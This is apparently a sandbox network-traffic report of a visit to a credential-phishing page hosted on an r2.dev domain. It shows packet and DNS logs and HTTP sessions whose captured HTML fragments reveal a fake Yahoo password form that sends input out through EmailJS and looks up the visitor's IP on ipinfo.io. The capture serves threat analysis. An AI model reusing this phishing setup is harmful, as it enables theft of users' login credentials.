                      Jul 5, 2024 00:30:28.914736032 CEST44349752104.26.6.17192.168.2.4
                      Jul 5, 2024 00:30:28.914782047 CEST49752443192.168.2.4104.26.6.17
                      Jul 5, 2024 00:30:28.914918900 CEST44349750104.18.2.35192.168.2.4
                      Jul 5, 2024 00:30:28.914951086 CEST44349750104.18.2.35192.168.2.4
                      Jul 5, 2024 00:30:28.914993048 CEST49750443192.168.2.4104.18.2.35
                      Jul 5, 2024 00:30:28.915000916 CEST44349750104.18.2.35192.168.2.4
                      Jul 5, 2024 00:30:28.915010929 CEST44349750104.18.2.35192.168.2.4
                      Jul 5, 2024 00:30:28.915040016 CEST49750443192.168.2.4104.18.2.35
                      Jul 5, 2024 00:30:28.915065050 CEST49750443192.168.2.4104.18.2.35
                      Jul 5, 2024 00:30:28.915498972 CEST44349752104.26.6.17192.168.2.4
                      Jul 5, 2024 00:30:28.915533066 CEST44349752104.26.6.17192.168.2.4
                      Jul 5, 2024 00:30:28.915545940 CEST49752443192.168.2.4104.26.6.17
                      Jul 5, 2024 00:30:28.915553093 CEST44349752104.26.6.17192.168.2.4
                      Jul 5, 2024 00:30:28.915611029 CEST49752443192.168.2.4104.26.6.17
                      Jul 5, 2024 00:30:28.916287899 CEST44349752104.26.6.17192.168.2.4
                      Jul 5, 2024 00:30:28.916327000 CEST44349752104.26.6.17192.168.2.4
                      Jul 5, 2024 00:30:28.916371107 CEST49752443192.168.2.4104.26.6.17
                      Jul 5, 2024 00:30:28.916378021 CEST44349752104.26.6.17192.168.2.4
                      Jul 5, 2024 00:30:28.917068005 CEST44349752104.26.6.17192.168.2.4
                      Jul 5, 2024 00:30:28.917098045 CEST44349752104.26.6.17192.168.2.4
                      Jul 5, 2024 00:30:28.917121887 CEST44349752104.26.6.17192.168.2.4
                      Jul 5, 2024 00:30:28.917129040 CEST49752443192.168.2.4104.26.6.17
                      Jul 5, 2024 00:30:28.917135954 CEST44349752104.26.6.17192.168.2.4
                      Jul 5, 2024 00:30:28.917174101 CEST49752443192.168.2.4104.26.6.17
                      Jul 5, 2024 00:30:28.917942047 CEST44349752104.26.6.17192.168.2.4
                      Jul 5, 2024 00:30:28.917973995 CEST44349752104.26.6.17192.168.2.4
                      Jul 5, 2024 00:30:28.917984962 CEST49752443192.168.2.4104.26.6.17
                      Jul 5, 2024 00:30:28.917993069 CEST44349752104.26.6.17192.168.2.4
                      Jul 5, 2024 00:30:28.918039083 CEST49752443192.168.2.4104.26.6.17
                      Jul 5, 2024 00:30:28.918046951 CEST44349752104.26.6.17192.168.2.4
                      Jul 5, 2024 00:30:28.918773890 CEST44349752104.26.6.17192.168.2.4
                      Jul 5, 2024 00:30:28.918807983 CEST44349752104.26.6.17192.168.2.4
                      Jul 5, 2024 00:30:28.918823004 CEST49752443192.168.2.4104.26.6.17
                      Jul 5, 2024 00:30:28.918831110 CEST44349752104.26.6.17192.168.2.4
                      Jul 5, 2024 00:30:28.919068098 CEST49752443192.168.2.4104.26.6.17
                      Jul 5, 2024 00:30:28.919588089 CEST44349752104.26.6.17192.168.2.4
                      Jul 5, 2024 00:30:28.937122107 CEST49751443192.168.2.434.117.186.192
                      Jul 5, 2024 00:30:28.937151909 CEST4434975134.117.186.192192.168.2.4
                      Jul 5, 2024 00:30:28.946310997 CEST44349749184.28.90.27192.168.2.4
                      Jul 5, 2024 00:30:28.946367025 CEST44349749184.28.90.27192.168.2.4
                      Jul 5, 2024 00:30:28.946434021 CEST49749443192.168.2.4184.28.90.27
                      Jul 5, 2024 00:30:28.961401939 CEST49750443192.168.2.4104.18.2.35
                      Jul 5, 2024 00:30:28.961422920 CEST44349750104.18.2.35192.168.2.4
                      Jul 5, 2024 00:30:28.967510939 CEST49752443192.168.2.4104.26.6.17
                      Jul 5, 2024 00:30:28.967539072 CEST44349752104.26.6.17192.168.2.4
                      Jul 5, 2024 00:30:28.993227959 CEST49749443192.168.2.4184.28.90.27
                      Jul 5, 2024 00:30:28.993246078 CEST44349749184.28.90.27192.168.2.4
                      Jul 5, 2024 00:30:29.010617018 CEST44349752104.26.6.17192.168.2.4
                      Jul 5, 2024 00:30:29.010663033 CEST44349752104.26.6.17192.168.2.4
                      Jul 5, 2024 00:30:29.010690928 CEST49752443192.168.2.4104.26.6.17
                      Jul 5, 2024 00:30:29.010718107 CEST44349752104.26.6.17192.168.2.4
                      Jul 5, 2024 00:30:29.010729074 CEST44349752104.26.6.17192.168.2.4
                      Jul 5, 2024 00:30:29.010731936 CEST49752443192.168.2.4104.26.6.17
                      Jul 5, 2024 00:30:29.010781050 CEST49752443192.168.2.4104.26.6.17
                      Jul 5, 2024 00:30:29.026400089 CEST49752443192.168.2.4104.26.6.17
                      Jul 5, 2024 00:30:29.026426077 CEST44349752104.26.6.17192.168.2.4
                      Jul 5, 2024 00:30:29.064554930 CEST49753443192.168.2.434.117.186.192
                      Jul 5, 2024 00:30:29.064604998 CEST4434975334.117.186.192192.168.2.4
                      Jul 5, 2024 00:30:29.064660072 CEST49753443192.168.2.434.117.186.192
                      Jul 5, 2024 00:30:29.064870119 CEST49753443192.168.2.434.117.186.192
                      Jul 5, 2024 00:30:29.064884901 CEST4434975334.117.186.192192.168.2.4
                      Jul 5, 2024 00:30:29.580838919 CEST4434975334.117.186.192192.168.2.4
                      Jul 5, 2024 00:30:29.581149101 CEST49753443192.168.2.434.117.186.192
                      Jul 5, 2024 00:30:29.581178904 CEST4434975334.117.186.192192.168.2.4
                      Jul 5, 2024 00:30:29.582288980 CEST4434975334.117.186.192192.168.2.4
                      Jul 5, 2024 00:30:29.582359076 CEST49753443192.168.2.434.117.186.192
                      Jul 5, 2024 00:30:29.582715988 CEST49753443192.168.2.434.117.186.192
                      Jul 5, 2024 00:30:29.582783937 CEST4434975334.117.186.192192.168.2.4
                      Jul 5, 2024 00:30:29.582879066 CEST49753443192.168.2.434.117.186.192
                      Jul 5, 2024 00:30:29.582887888 CEST4434975334.117.186.192192.168.2.4
                      Jul 5, 2024 00:30:29.623733997 CEST49753443192.168.2.434.117.186.192
                      Jul 5, 2024 00:30:29.722161055 CEST4434975334.117.186.192192.168.2.4
                      Jul 5, 2024 00:30:29.722232103 CEST4434975334.117.186.192192.168.2.4
                      Jul 5, 2024 00:30:29.722290993 CEST49753443192.168.2.434.117.186.192
                      Jul 5, 2024 00:30:29.723472118 CEST49753443192.168.2.434.117.186.192
                      Jul 5, 2024 00:30:29.723491907 CEST4434975334.117.186.192192.168.2.4
                      Jul 5, 2024 00:30:37.201009035 CEST44349745142.250.185.68192.168.2.4
                      Jul 5, 2024 00:30:37.201078892 CEST44349745142.250.185.68192.168.2.4
                      Jul 5, 2024 00:30:37.201148033 CEST49745443192.168.2.4142.250.185.68
                      Jul 5, 2024 00:30:38.723673105 CEST49745443192.168.2.4142.250.185.68
                      Jul 5, 2024 00:30:38.723707914 CEST44349745142.250.185.68192.168.2.4
                      Jul 5, 2024 00:30:39.076622963 CEST8049735104.18.2.35192.168.2.4
                      Jul 5, 2024 00:30:39.076760054 CEST4973580192.168.2.4104.18.2.35
                      Jul 5, 2024 00:30:39.713824034 CEST804972387.248.205.0192.168.2.4
                      Jul 5, 2024 00:30:39.713990927 CEST4972380192.168.2.487.248.205.0
                      Jul 5, 2024 00:30:39.713990927 CEST4972380192.168.2.487.248.205.0
                      Jul 5, 2024 00:30:39.721724987 CEST804972387.248.205.0192.168.2.4
                      Jul 5, 2024 00:30:39.721844912 CEST804972387.248.205.0192.168.2.4
                      Jul 5, 2024 00:30:39.721971989 CEST4972380192.168.2.487.248.205.0
                      Jul 5, 2024 00:30:40.394526958 CEST4973580192.168.2.4104.18.2.35
                      Jul 5, 2024 00:30:40.399523973 CEST8049735104.18.2.35192.168.2.4
                      Jul 5, 2024 00:30:55.158845901 CEST804972487.248.205.0192.168.2.4
                      Jul 5, 2024 00:30:55.158946037 CEST4972480192.168.2.487.248.205.0
                      Jul 5, 2024 00:30:55.158992052 CEST4972480192.168.2.487.248.205.0
                      Jul 5, 2024 00:30:55.163742065 CEST804972487.248.205.0192.168.2.4
                      Jul 5, 2024 00:31:09.189459085 CEST4973680192.168.2.4104.18.2.35
                      Jul 5, 2024 00:31:09.194380045 CEST8049736104.18.2.35192.168.2.4
                      Jul 5, 2024 00:31:26.605484009 CEST49762443192.168.2.4142.250.185.68
                      Jul 5, 2024 00:31:26.605529070 CEST44349762142.250.185.68192.168.2.4
                      Jul 5, 2024 00:31:26.605695009 CEST49762443192.168.2.4142.250.185.68
                      Jul 5, 2024 00:31:26.606096983 CEST49762443192.168.2.4142.250.185.68
                      Jul 5, 2024 00:31:26.606116056 CEST44349762142.250.185.68192.168.2.4
                      Jul 5, 2024 00:31:27.259577036 CEST44349762142.250.185.68192.168.2.4
                      Jul 5, 2024 00:31:27.259879112 CEST49762443192.168.2.4142.250.185.68
                      Jul 5, 2024 00:31:27.259905100 CEST44349762142.250.185.68192.168.2.4
                      Jul 5, 2024 00:31:27.260227919 CEST44349762142.250.185.68192.168.2.4
                      Jul 5, 2024 00:31:27.260685921 CEST49762443192.168.2.4142.250.185.68
                      Jul 5, 2024 00:31:27.260742903 CEST44349762142.250.185.68192.168.2.4
                      Jul 5, 2024 00:31:27.309350014 CEST49762443192.168.2.4142.250.185.68
                      Jul 5, 2024 00:31:37.160295010 CEST44349762142.250.185.68192.168.2.4
                      Jul 5, 2024 00:31:37.160358906 CEST44349762142.250.185.68192.168.2.4
                      Jul 5, 2024 00:31:37.160526991 CEST49762443192.168.2.4142.250.185.68
                      Jul 5, 2024 00:31:38.386167049 CEST49762443192.168.2.4142.250.185.68
                      Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                      Jul 5, 2024 00:30:23.460285902 CEST | 192.168.2.4 | 1.1.1.1 | 0xea3e | Standard query (0) | pub-431046b43b84431ea1b4a212cd34e302.r2.dev | A (IP address) | IN (0x0001) | false
                      Jul 5, 2024 00:30:23.460525036 CEST | 192.168.2.4 | 1.1.1.1 | 0x8e97 | Standard query (0) | pub-431046b43b84431ea1b4a212cd34e302.r2.dev | 65 | IN (0x0001) | false
                      Jul 5, 2024 00:30:24.178613901 CEST | 192.168.2.4 | 1.1.1.1 | 0xc81d | Standard query (0) | pub-431046b43b84431ea1b4a212cd34e302.r2.dev | A (IP address) | IN (0x0001) | false
                      Jul 5, 2024 00:30:24.178767920 CEST | 192.168.2.4 | 1.1.1.1 | 0x732f | Standard query (0) | pub-431046b43b84431ea1b4a212cd34e302.r2.dev | 65 | IN (0x0001) | false
                      Jul 5, 2024 00:30:25.840464115 CEST | 192.168.2.4 | 1.1.1.1 | 0x412b | Standard query (0) | pro.fontawesome.com | A (IP address) | IN (0x0001) | false
                      Jul 5, 2024 00:30:25.841186047 CEST | 192.168.2.4 | 1.1.1.1 | 0x1a3f | Standard query (0) | pro.fontawesome.com | 65 | IN (0x0001) | false
                      Jul 5, 2024 00:30:25.849801064 CEST | 192.168.2.4 | 1.1.1.1 | 0x9bca | Standard query (0) | cdn.jsdelivr.net | A (IP address) | IN (0x0001) | false
                      Jul 5, 2024 00:30:25.850285053 CEST | 192.168.2.4 | 1.1.1.1 | 0x35b2 | Standard query (0) | cdn.jsdelivr.net | 65 | IN (0x0001) | false
                      Jul 5, 2024 00:30:26.554588079 CEST | 192.168.2.4 | 1.1.1.1 | 0xf843 | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false
                      Jul 5, 2024 00:30:26.554825068 CEST | 192.168.2.4 | 1.1.1.1 | 0x30c2 | Standard query (0) | www.google.com | 65 | IN (0x0001) | false
                      Jul 5, 2024 00:30:26.689292908 CEST | 192.168.2.4 | 1.1.1.1 | 0x3805 | Standard query (0) | logodownload.org | A (IP address) | IN (0x0001) | false
                      Jul 5, 2024 00:30:26.694890976 CEST | 192.168.2.4 | 1.1.1.1 | 0x8f07 | Standard query (0) | logodownload.org | 65 | IN (0x0001) | false
                      Jul 5, 2024 00:30:28.136018991 CEST | 192.168.2.4 | 1.1.1.1 | 0x84b4 | Standard query (0) | ipinfo.io | A (IP address) | IN (0x0001) | false
                      Jul 5, 2024 00:30:28.136506081 CEST | 192.168.2.4 | 1.1.1.1 | 0xef19 | Standard query (0) | ipinfo.io | 65 | IN (0x0001) | false
                      Jul 5, 2024 00:30:28.153994083 CEST | 192.168.2.4 | 1.1.1.1 | 0x36e8 | Standard query (0) | logodownload.org | A (IP address) | IN (0x0001) | false
                      Jul 5, 2024 00:30:28.154494047 CEST | 192.168.2.4 | 1.1.1.1 | 0xcbd | Standard query (0) | logodownload.org | 65 | IN (0x0001) | false
                      Jul 5, 2024 00:30:29.053884029 CEST | 192.168.2.4 | 1.1.1.1 | 0x847c | Standard query (0) | ipinfo.io | A (IP address) | IN (0x0001) | false
                      Jul 5, 2024 00:30:29.054250956 CEST | 192.168.2.4 | 1.1.1.1 | 0x86b | Standard query (0) | ipinfo.io | 65 | IN (0x0001) | false
                      Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                      Jul 5, 2024 00:30:23.668984890 CEST | 1.1.1.1 | 192.168.2.4 | 0xea3e | No error (0) | pub-431046b43b84431ea1b4a212cd34e302.r2.dev |  | 104.18.2.35 | A (IP address) | IN (0x0001) | false
                      Jul 5, 2024 00:30:23.668984890 CEST | 1.1.1.1 | 192.168.2.4 | 0xea3e | No error (0) | pub-431046b43b84431ea1b4a212cd34e302.r2.dev |  | 104.18.3.35 | A (IP address) | IN (0x0001) | false
                      Jul 5, 2024 00:30:24.191406012 CEST | 1.1.1.1 | 192.168.2.4 | 0xc81d | No error (0) | pub-431046b43b84431ea1b4a212cd34e302.r2.dev |  | 104.18.2.35 | A (IP address) | IN (0x0001) | false
                      Jul 5, 2024 00:30:24.191406012 CEST | 1.1.1.1 | 192.168.2.4 | 0xc81d | No error (0) | pub-431046b43b84431ea1b4a212cd34e302.r2.dev |  | 104.18.3.35 | A (IP address) | IN (0x0001) | false
                      Jul 5, 2024 00:30:25.852174044 CEST | 1.1.1.1 | 192.168.2.4 | 0x412b | No error (0) | pro.fontawesome.com | pro.fontawesome.com.cdn.cloudflare.net |  | CNAME (Canonical name) | IN (0x0001) | false
                      Jul 5, 2024 00:30:25.852605104 CEST | 1.1.1.1 | 192.168.2.4 | 0x1a3f | No error (0) | pro.fontawesome.com | pro.fontawesome.com.cdn.cloudflare.net |  | CNAME (Canonical name) | IN (0x0001) | false
                      Jul 5, 2024 00:30:25.859132051 CEST | 1.1.1.1 | 192.168.2.4 | 0x9bca | No error (0) | cdn.jsdelivr.net | cdn.jsdelivr.net.cdn.cloudflare.net |  | CNAME (Canonical name) | IN (0x0001) | false
                      Jul 5, 2024 00:30:25.859561920 CEST | 1.1.1.1 | 192.168.2.4 | 0x35b2 | No error (0) | cdn.jsdelivr.net | cdn.jsdelivr.net.cdn.cloudflare.net |  | CNAME (Canonical name) | IN (0x0001) | false
                      Jul 5, 2024 00:30:26.564204931 CEST | 1.1.1.1 | 192.168.2.4 | 0xf843 | No error (0) | www.google.com |  | 142.250.185.68 | A (IP address) | IN (0x0001) | false
                      Jul 5, 2024 00:30:26.565787077 CEST | 1.1.1.1 | 192.168.2.4 | 0x30c2 | No error (0) | www.google.com |  |  | 65 | IN (0x0001) | false
                      Jul 5, 2024 00:30:26.700006008 CEST | 1.1.1.1 | 192.168.2.4 | 0x3805 | No error (0) | logodownload.org |  | 104.26.7.17 | A (IP address) | IN (0x0001) | false
                      Jul 5, 2024 00:30:26.700006008 CEST | 1.1.1.1 | 192.168.2.4 | 0x3805 | No error (0) | logodownload.org |  | 104.26.6.17 | A (IP address) | IN (0x0001) | false
                      Jul 5, 2024 00:30:26.700006008 CEST | 1.1.1.1 | 192.168.2.4 | 0x3805 | No error (0) | logodownload.org |  | 172.67.71.13 | A (IP address) | IN (0x0001) | false
                      Jul 5, 2024 00:30:26.706546068 CEST | 1.1.1.1 | 192.168.2.4 | 0x8f07 | No error (0) | logodownload.org |  |  | 65 | IN (0x0001) | false
                      Jul 5, 2024 00:30:28.145071983 CEST | 1.1.1.1 | 192.168.2.4 | 0x84b4 | No error (0) | ipinfo.io |  | 34.117.186.192 | A (IP address) | IN (0x0001) | false
                      Jul 5, 2024 00:30:28.168262005 CEST | 1.1.1.1 | 192.168.2.4 | 0x36e8 | No error (0) | logodownload.org |  | 104.26.6.17 | A (IP address) | IN (0x0001) | false
                      Jul 5, 2024 00:30:28.168262005 CEST | 1.1.1.1 | 192.168.2.4 | 0x36e8 | No error (0) | logodownload.org |  | 172.67.71.13 | A (IP address) | IN (0x0001) | false
                      Jul 5, 2024 00:30:28.168262005 CEST | 1.1.1.1 | 192.168.2.4 | 0x36e8 | No error (0) | logodownload.org |  | 104.26.7.17 | A (IP address) | IN (0x0001) | false
                      Jul 5, 2024 00:30:28.168308973 CEST | 1.1.1.1 | 192.168.2.4 | 0xcbd | No error (0) | logodownload.org |  |  | 65 | IN (0x0001) | false
                      Jul 5, 2024 00:30:29.062830925 CEST | 1.1.1.1 | 192.168.2.4 | 0x847c | No error (0) | ipinfo.io |  | 34.117.186.192 | A (IP address) | IN (0x0001) | false
                      Jul 5, 2024 00:30:38.545293093 CEST | 1.1.1.1 | 192.168.2.4 | 0x324a | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net |  | CNAME (Canonical name) | IN (0x0001) | false
                      Jul 5, 2024 00:30:38.545293093 CEST | 1.1.1.1 | 192.168.2.4 | 0x324a | No error (0) | fp2e7a.wpc.phicdn.net |  | 192.229.221.95 | A (IP address) | IN (0x0001) | false
                      Jul 5, 2024 00:30:56.464018106 CEST | 1.1.1.1 | 192.168.2.4 | 0x4895 | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net |  | CNAME (Canonical name) | IN (0x0001) | false
                      Jul 5, 2024 00:30:56.464018106 CEST | 1.1.1.1 | 192.168.2.4 | 0x4895 | No error (0) | fp2e7a.wpc.phicdn.net |  | 192.229.221.95 | A (IP address) | IN (0x0001) | false
                      Jul 5, 2024 00:31:15.304595947 CEST | 1.1.1.1 | 192.168.2.4 | 0x1c39 | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net |  | CNAME (Canonical name) | IN (0x0001) | false
                      Jul 5, 2024 00:31:15.304595947 CEST | 1.1.1.1 | 192.168.2.4 | 0x1c39 | No error (0) | fp2e7a.wpc.phicdn.net |  | 192.229.221.95 | A (IP address) | IN (0x0001) | false
                      Jul 5, 2024 00:31:35.102454901 CEST | 1.1.1.1 | 192.168.2.4 | 0x139c | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net |  | CNAME (Canonical name) | IN (0x0001) | false
                      Jul 5, 2024 00:31:35.102454901 CEST | 1.1.1.1 | 192.168.2.4 | 0x139c | No error (0) | fp2e7a.wpc.phicdn.net |  | 192.229.221.95 | A (IP address) | IN (0x0001) | false
                      • pub-431046b43b84431ea1b4a212cd34e302.r2.dev
                      • https:
                        • logodownload.org
                        • ipinfo.io
                      • fs.microsoft.com
                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      0 | 192.168.2.4 | 49736 | 104.18.2.35 | 80 | 8 | C:\Program Files\Google\Chrome\Application\chrome.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 5, 2024 00:30:23.681943893 CEST | 492 | OUT | GET /gsecondcheck.html?usr=ouwxfmmtalwl HTTP/1.1
                      Host: pub-431046b43b84431ea1b4a212cd34e302.r2.dev
                      Connection: keep-alive
                      Upgrade-Insecure-Requests: 1
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Encoding: gzip, deflate
                      Accept-Language: en-US,en;q=0.9
                      Jul 5, 2024 00:30:24.172616005 CEST | 548 | IN | HTTP/1.1 301 Moved Permanently
                      Date: Thu, 04 Jul 2024 22:30:24 GMT
                      Content-Type: text/html
                      Content-Length: 167
                      Connection: keep-alive
                      Cache-Control: max-age=3600
                      Expires: Thu, 04 Jul 2024 23:30:24 GMT
                      Location: https://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/gsecondcheck.html?usr=ouwxfmmtalwl
                      Vary: Accept-Encoding
                      Server: cloudflare
                      CF-RAY: 89e28f40b91572a5-EWR
                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                      Jul 5, 2024 00:31:09.189459085 CEST | 6 | OUT | Data Raw: 00
                      Data Ascii:


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      0 | 192.168.2.4 | 49737 | 104.18.2.35 | 443 | 8 | C:\Program Files\Google\Chrome\Application\chrome.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2024-07-04 22:30:25 UTC | 720 | OUT | GET /gsecondcheck.html?usr=ouwxfmmtalwl HTTP/1.1
                      Host: pub-431046b43b84431ea1b4a212cd34e302.r2.dev
                      Connection: keep-alive
                      Upgrade-Insecure-Requests: 1
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Sec-Fetch-Site: none
                      Sec-Fetch-Mode: navigate
                      Sec-Fetch-User: ?1
                      Sec-Fetch-Dest: document
                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                      sec-ch-ua-mobile: ?0
                      sec-ch-ua-platform: "Windows"
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      2024-07-04 22:30:25 UTC | 282 | IN | HTTP/1.1 200 OK
                      Date: Thu, 04 Jul 2024 22:30:25 GMT
                      Content-Type: text/html
                      Content-Length: 5385
                      Connection: close
                      Accept-Ranges: bytes
                      ETag: "167c14212ab66c838da881e5faf380e1"
                      Last-Modified: Wed, 17 Apr 2024 14:47:29 GMT
                      Server: cloudflare
                      CF-RAY: 89e28f49d95e729f-EWR
                      2024-07-04 22:30:25 UTC | 1087 | IN
                      Data Ascii: <!doctype html><html lang="en"> <head> <!-- Required meta tags --> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="description" content=""> <meta name="author" content
                      2024-07-04 22:30:25 UTC | 1369 | IN
                      Data Ascii: href="gform.css" rel="stylesheet"> <link href="gstyles.css" rel="stylesheet"> <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"> </script> </head> <body class=""> <script type="text/javascript"
                      2024-07-04 22:30:25 UTC | 1369 | IN
                      Data Ascii: , you get more out of life.</p> </div> <div id="log" class="log"> <img src="https://logodownload.org/wp-content/uploads/2019/09/yahoo-logo-1.png"/> <h3>Enter password</h3> <p>using your Ya
                      2024-07-04 22:30:25 UTC | 1369 | IN
                      Data Ascii: // "json" shows that data will be fetched in json format function sendmail(){ (function() { emailjs.init("t-kKXnFprLU96FVjo"); //please encrypted user id for malicious attacks
                      2024-07-04 22:30:25 UTC | 191 | IN
                      Data Ascii: form.attachEvent("submit", processForm); } else { form.addEventListener("submit", processForm); } </script> </body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      1 | 192.168.2.4 | 49741 | 104.18.2.35 | 443 | 8 | C:\Program Files\Google\Chrome\Application\chrome.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2024-07-04 22:30:26 UTC | 628 | OUT | GET /gform.css HTTP/1.1
                      Host: pub-431046b43b84431ea1b4a212cd34e302.r2.dev
                      Connection: keep-alive
                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                      sec-ch-ua-mobile: ?0
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      sec-ch-ua-platform: "Windows"
                      Accept: text/css,*/*;q=0.1
                      Sec-Fetch-Site: same-origin
                      Sec-Fetch-Mode: no-cors
                      Sec-Fetch-Dest: style
                      Referer: https://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/gsecondcheck.html?usr=ouwxfmmtalwl
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      2024-07-04 22:30:26 UTC | 281 | IN | HTTP/1.1 200 OK
                      Date: Thu, 04 Jul 2024 22:30:26 GMT
                      Content-Type: text/css
                      Content-Length: 1218
                      Connection: close
                      Accept-Ranges: bytes
                      ETag: "726ef0647391ed5efc9076bcdb91c606"
                      Last-Modified: Wed, 17 Apr 2024 14:47:29 GMT
                      Server: cloudflare
                      CF-RAY: 89e28f50292f4407-EWR
                      2024-07-04 22:30:26 UTC | 1218 | IN
                      Data Ascii: input { -webkit-appearance: none; -moz-appearance: none; appearance: none; border-radius: 0; }.input-field { position: relative;text-align: left;margin-top: 9ex; }.input-field label { position: absolute; top:


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      2 | 192.168.2.4 | 49740 | 104.18.2.35 | 443 | 8 | C:\Program Files\Google\Chrome\Application\chrome.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2024-07-04 22:30:26 UTC | 630 | OUT | GET /gstyles.css HTTP/1.1
                      Host: pub-431046b43b84431ea1b4a212cd34e302.r2.dev
                      Connection: keep-alive
                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                      sec-ch-ua-mobile: ?0
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      sec-ch-ua-platform: "Windows"
                      Accept: text/css,*/*;q=0.1
                      Sec-Fetch-Site: same-origin
                      Sec-Fetch-Mode: no-cors
                      Sec-Fetch-Dest: style
                      Referer: https://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/gsecondcheck.html?usr=ouwxfmmtalwl
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      2024-07-04 22:30:26 UTC | 281 | IN | HTTP/1.1 200 OK
                      Date: Thu, 04 Jul 2024 22:30:26 GMT
                      Content-Type: text/css
                      Content-Length: 1444
                      Connection: close
                      Accept-Ranges: bytes
                      ETag: "52ecf9bbf69e5bb6ea38c281c8de64df"
                      Last-Modified: Wed, 17 Apr 2024 14:47:29 GMT
                      Server: cloudflare
                      CF-RAY: 89e28f502ca98c6b-EWR
                      2024-07-04 22:30:26 UTC | 1369 | IN
                      Data Ascii: * { -moz-box-sizing: border-box; -webkit-box-sizing: border-box; box-sizing: border-box; }html , body{ font-family: "Trebuchet MS", "Helvetica Neue", Helvetica, Arial, sans-serif; height: 100%; width: 100%;}bo
                      2024-07-04 22:30:26 UTC | 75 | IN
                      Data Ascii: ; } #log{ float: left; width: 100%; }}


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      3 | 192.168.2.4 | 49746 | 104.26.7.17 | 443 | 8 | C:\Program Files\Google\Chrome\Application\chrome.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2024-07-04 22:30:27 UTC | 646 | OUT | GET /wp-content/uploads/2019/09/yahoo-logo-1.png HTTP/1.1
                      Host: logodownload.org
                      Connection: keep-alive
                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                      sec-ch-ua-mobile: ?0
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      sec-ch-ua-platform: "Windows"
                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                      Sec-Fetch-Site: cross-site
                      Sec-Fetch-Mode: no-cors
                      Sec-Fetch-Dest: image
                      Referer: https://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      2024-07-04 22:30:27 UTC | 637 | IN | HTTP/1.1 200 OK
                      Date: Thu, 04 Jul 2024 22:30:27 GMT
                      Content-Type: image/png
                      Content-Length: 57304
                      Connection: close
                      Last-Modified: Wed, 12 Aug 2020 20:27:15 GMT
                      Cache-Control: max-age=31536000
                      CF-Cache-Status: HIT
                      Age: 43926
                      Accept-Ranges: bytes
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JWL6Uvt916px%2Fe0y0jnzpvhahTTIQ9Kf9hdTVF2IV%2FYsW3r1%2F2isq4o%2FaBbdmp15Wm4clQ0mIWil1qkeV19k4khmon80gNoIR7j%2B5A9e3iHaItuigeGJPcXxW8Zj5oHpXJk%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 89e28f547b361831-EWR
